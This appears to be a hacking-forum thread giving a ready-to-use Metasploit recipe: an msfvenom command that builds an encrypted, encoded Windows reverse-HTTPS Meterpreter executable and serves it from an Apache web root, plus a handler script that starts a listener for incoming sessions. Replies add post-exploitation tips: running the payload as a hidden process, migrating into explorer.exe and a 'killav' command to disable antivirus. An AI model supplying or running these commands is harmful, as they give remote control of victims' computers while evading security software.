Encrypted MSF Payload & Listener
Page 1 of 1
Encrypted MSF Payload & Listener
Encrypted MSF Payload & Listener
rc file (makerc scriptname)
the create payload script (./startE.sh)
Start apache2 server
Now use the create script to create payload then use rc script to start the listener
rc file (makerc scriptname)
- Code:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set EnableStagedEncoding true
set Encoding x86/shikata_ga_nai
set Iterations 10
set LHOST your-local-ip
set lPORT 5555
set ExitOnSession false
exploit -j -z
the create payload script (./startE.sh)
- Code:
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=your-local-ip LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 --encrypt aes256 -o /var/www/html/winRe.exe
Start apache2 server
- Code:
sudo service apache2 start
Now use the create script to create payload then use rc script to start the listener
Re: Encrypted MSF Payload & Listener
Pro Tip
You can use eth0 to auto populate the IP
from msf5+
You can use eth0 to auto populate the IP
- Code:
set LHOST eth0
from msf5+
Re: Encrypted MSF Payload & Listener
Post Exploitation
Where H = hidden process shell.exe is the payload.
- Code:
execute -H -f shell.exe
Where H = hidden process shell.exe is the payload.
Re: Encrypted MSF Payload & Listener
Pro Tip:
Instead of ps and then migrate just 1 command!
- Code:
migrate -N explorer.exe
Instead of ps and then migrate just 1 command!
Re: Encrypted MSF Payload & Listener
Pro Tip:
This will attempt to kill any AV protection!
- Code:
run killav
This will attempt to kill any AV protection!
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|